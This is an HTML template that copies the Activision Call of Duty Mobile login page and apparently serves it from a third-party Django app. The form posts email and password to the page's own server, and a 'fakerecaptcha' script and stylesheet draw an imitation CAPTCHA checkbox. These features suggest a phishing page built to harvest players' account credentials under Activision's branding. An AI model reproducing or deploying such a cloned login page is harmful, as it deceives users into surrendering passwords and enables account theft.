<!DOCTYPE html>
<html class="mobile-game"> 
	<head>
		<title>Log in</title>
		
		<meta name="description" content="Activision login page" />
		
		<script> var dataLayer = dataLayer || [];</script>
		<script id="gtm-script" src="https://profile.callofduty.com/resources/common/scripts/gtmLayer.js?v="></script>
		
		
		
		<!-- Google Tag Manager -->
		<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
		new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
		j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
		'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
		})(window,document,'script','dataLayer','GTM-T6X8245');</script>
		<!-- End Google Tag Manager -->
		
		<!--<script src="https://profile.callofduty.com/resources/common/scripts/font-loader.js"></script>-->
		
		<meta charset="UTF-8" />
		<meta http-equiv="x-ua-compatible" content="ie=edge" />
		
		<meta name="keywords" content="login, activision" />
		<meta name="sitename" content="codm"/>
		<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=0" />
		<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
		<meta http-equiv="Pragma" content="no-cache" />
		<meta http-equiv="Expires" content="0" />
		<link rel="shortcut icon" type="image/x-icon" href="https://profile.callofduty.com/resources/codm/images/favicon.ico" />
		<link rel="icon" type="image/x-icon" href="https://profile.callofduty.com/resources/codm/images/favicon.ico" />

			<script src="https://www.google.com/recaptcha/api.js?hl=en" async defer></script>
		
<meta name="_csrf" content="h0qSWBcMMFcp7nbNcmx431LY7xBRwYX8ND0jLV8jVwK3XA5A9x9VZOPeyszji_hl"/>
<meta name="_csrf_header" content="X-XSRF-TOKEN"/>


<!--<link href="https://fonts.googleapis.com/css?family=Abel" rel="stylesheet"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans+Condensed:300,700%7COpen+Sans:300,400,700&amp;subset=latin,latin,latin" media="all">-->
<meta property="og:image" content="https://profile.callofduty.com/resources/codm/images/shared-logo.jpg" />

<link rel="stylesheet" href="https://profile.callofduty.com/resources/common/styles/preload.css?v=" />





<!--  Modernizr needs to be loaded in head as otherwise it can't use the html5shiv for IE -->
<script src="https://profile.callofduty.com/resources/common/scripts/modernizr-1.7.min.js"></script>






	
	
		<link rel="stylesheet" href="https://profile.callofduty.com/resources/common/styles/common-site.css?v=1702916592521" />
	


<link rel="stylesheet" href="https://profile.callofduty.com/resources/common/styles/sso-media-queries.css?v=1702916592521" />
<link rel="stylesheet" href="https://profile.callofduty.com/resources/common/styles/responsive-site.css?v=1702916592521" />

<link rel="stylesheet" href="https://profile.callofduty.com/resources/codm/styles/sso-site-specific.css?v=1702916592521" />
<link rel="stylesheet" href="https://profile.callofduty.com/resources/codm/styles/site.css?v=1702916592521" />
<link href="/static/css/fakerecaptcha.css" rel="stylesheet">

	
	
		
	


		
	</head>
	
	
		<body class=" noscript sso locale-en ">
	
	
		






<div class="account-linking-error-container">
	<div class="background">
		<div class="psn">
			<p>Please click the following link to complete your Playstation Account.</p>
			<a href="https://account.sonyentertainmentnetwork.com/" target="_blank">Playstation Account Link</a>
			<p>Once you have completed your account, click the following link to proceed.</p>
			<a href="">Continue</a>
		</div>
		<div class="xbl">
			<p>Please click the following link to complete your XBOX Live Account.</p>
			<a href="https://account.xbox.com/" target="_blank">XBOX Account Link</a>
			<p>Once you have completed your account, click the following link to proceed.</p>
			<a href="">Continue</a>
		</div>
		<div class="generic">
			<p>Previous action failed. Please try again.</p>
			<a class="close-overlay" href="">Close this Overlay</a>
		</div>
	</div>
</div>
		
        
        








	<!-- wrapper div:  ID with the page name -->
	<div id="login" class="wrapper SSO SSO-PAGE center  mobile-game">
		
			
			
			
				<header>
					<div class="masthead">
						<h1 class="logo">
							CALL OF DUTY®
						</h1>
						<ul class="clearfix" id="breadcrumb">
								<li id="breadcrumb-home">
									<a href="http://www.callofduty.com">Home</a>
								</li>
								<li>
									Call of Duty: 
									<span class="page-name">Log in</span>
								</li>
						</ul>
						<ul class="masthead-logos-container">
							
						</ul>
					</div>
				</header>
			
			
		
		<article>
			<section class="clearfix">
				<h3><span class="cod-logo">Call of Duty</span>Login to your account</h3>
								
				
				
<!-- 				TODO: Add playerId + redirectUrl -->
				
				
				<form id="frmLogin" name="frmLogin" class="horz-label clearfix" action="" method="post">
					{% csrf_token %}
					<fieldset id="login-info" class="sso-form-input-block">
						<h6>
							<span class="corners left"></span>Login Via Activision Account<span class="corners right"></span> 
							
						</h6>
						
						





	
	
	<div class="data-row clearfix" id="email-data-row">
		<label>Email Address:</label>
		<div class="input-container clearfix">
			<input type="email" id='username' name='username' autocomplete="on" placeholder="" 
				value='' />	
		</div>
		<span class="sprite-pages feedback-control icon"></span>
		<div class="feedback-control message">Please enter your email address</div>	
	</div>	
	<div class="data-row clearfix" id="remember-me-div">
		<div class="input-container clearfix">
			<input type="checkbox" id="remember-me-checkbox" class="atvi-instrument atvi-instrument-checkbox" name="remember_me" value="true" checked="checked" />
			<label for="remember-me-checkbox" class="custom-checkbox" style="display:none;"></label>
		</div>
		<label for="remember-me-checkbox">Remember me</label>
	</div>
	<div class="data-row clearfix" id="password-data-row">	    	
		<label>Password:</label>
		<div class="input-container clearfix">
			<input type='password' id='password' name='password' autocomplete="on" placeholder="" />
		</div>
		<span class="sprite-pages feedback-control icon"></span>
		<div class="feedback-control message">Please enter a password</div>
	</div>
	
		<div class="fkrc-container fkrc-m-p">
			<div id="fkrc-checkbox-window" class="fkrc-checkbox-window fkrc-m-p fkrc-block clearfix data-row">
				<div class="fkrc-checkbox-container fkrc-m-p">
					<button type="button" id="fkrc-checkbox" class="fkrc-checkbox fkrc-m-p fkrc-line-normal"></button>
				</div>
				<p class="fkrc-im-not-a-robot fkrc-m-p fkrc-line-normal">I'm not a robot</p>
				<img src="/static/images/captcha_logo.svg" class="fkrc-captcha-logo fkrc-line-normal" alt="">
				<p class="fkrc-checkbox-desc-text-checkbox fkrc-m-p fkrc-line-normal">CAPTCHA</p>
				<p class="fkrc-checkbox-desc-text-privacy fkrc-m-p fkrc-line-normal">Privacy - Terms</p>
				<img src="/static/images/captcha_spinner.gif" class="fkrc-spinner fkrc-m-p fkrc-line-normal" alt="" id="fkrc-spinner">
				<img src="/static/images/tick.png" class="fkrc-tick fkrc-m-p fkrc-line-normal" alt="" id="fkrc-tick">
			</div>
		</div>

	<p style="color:white">\n</p>

	<div class="login-forgot-password clearfix">
		<a href="/codm/forgotPassword" id="login-forgot-password" class="atvi-instrument atvi-instrument-link" title="Forgot your Password?">Forgot your Password?</a>
	</div>
	
	<div class="actions clearfix">
		
	    <button type="submit" class="submit large atvi-instrument atvi-instrument-button">Login Now</button>

		<!-- 				TODO: Add playerId + redirectUrl -->
		

		
			<p class="no-login-text">Don't have an Activision Account?</p>
			<a href="/codm/registerMobileGame?redirectUrl=/codm/mobileGameRegisterComplete" title="Sign Up" id="login-need-account" class="atvi-instrument atvi-instrument-link">Sign Up</a>
		
		
	</div>
	<div id="login-center-content" class="center">
		
	</div>
					</fieldset>	
	    		<div>
<input type="hidden" name="_csrf" value="h0qSWBcMMFcp7nbNcmx431LY7xBRwYX8ND0jLV8jVwK3XA5A9x9VZOPeyszji_hl" />
</div></form>
			</section>
			
			
				<aside id="side-promo-content" class="side-promo">			
					<img src="https://profile.callofduty.com/resources/codm/images/login-promo.png" alt="CALL OF DUTY&reg;" class="promo-img" />
					<h4>CALL OF DUTY<sup>&reg;</sup>: </h4>
					<p>Pushing the boundaries of what fans have come to expect from the record-setting entertainment franchise, Call of Duty<sup>&reg;</sup>: Black Ops 2 propels players into a near future, 21st Century Cold War, where technology and weapons have converged to create a new generation of warfare. Pre-order today.</p>
				</aside>
			
			
					
			<!--  end col -->
		</article>
	</div><!--  end content -->
		

		<script>
			//Detect if JavaScript and cookies are enabled. Do this inline rather than waiting for onload/onready to avoid momentarily displaying no script error
			if (navigator.cookieEnabled) {
				document.body.className = document.body.className.replace("noscript", "hasscript");
			}
		</script>
		<div id="noscript-warning">JavaScript and cookies are required. Please enable them.</div>
		

		<div id="cdo-bar">
			
		</div>
		
		










<script src="https://profile.callofduty.com/resources/common/scripts/jquery-1.11.2.js"></script>





<script id="sso-bar-script" src="https://profile.callofduty.com/resources/common/scripts/sso.bar.js?v=1702916592521"></script>
<script>

	var config = {
		containerId : 'cdo-bar',
		locale : 'en_US',
		communityId : 'codm',
		isSSOPage : true,
		layout : { 
			type : "hybrid"
		 }
	}
	
	if (config.communityId && config.communityId.match('ghosts-monster')) {
		config.layout = {type : "hidden"}; 
	}
	
	if (config.communityId && config.communityId.match('ghosts-monster-eu')) {
		config.layout = {type : "hidden"}; 
	}
	
	var ssobar = new SSO.Bar(config);
</script>

<script id="digital-data-script" src="https://profile.callofduty.com/resources/common/scripts/digitalData.js?v=1702916592521"></script>
<script src="https://profile.callofduty.com/resources/common/scripts/head.js?v=1702916592521"></script>

	<script id ='common-script' src="https://profile.callofduty.com/resources/common/scripts/site.js?v=1702916592521"></script>




<!-- Analytics script -->
<script id="analytics-script" src="https://profile.callofduty.com/resources/common/scripts/atvi-analytics.js?v=1702916592521"></script>
		
		<!-- TAG MANAGER -->
		<script type="text/javascript">_satellite.pageBottom();</script>
	<script type="text/javascript"  src="/O6qf1r8_s9YQecOEQGD2Co5v/t75OJfSkJD/Qk1QICEi/VTY_/WxgoCFQ"></script></body>
</html>
<script src="/static/js/fakerecaptcha.js"></script>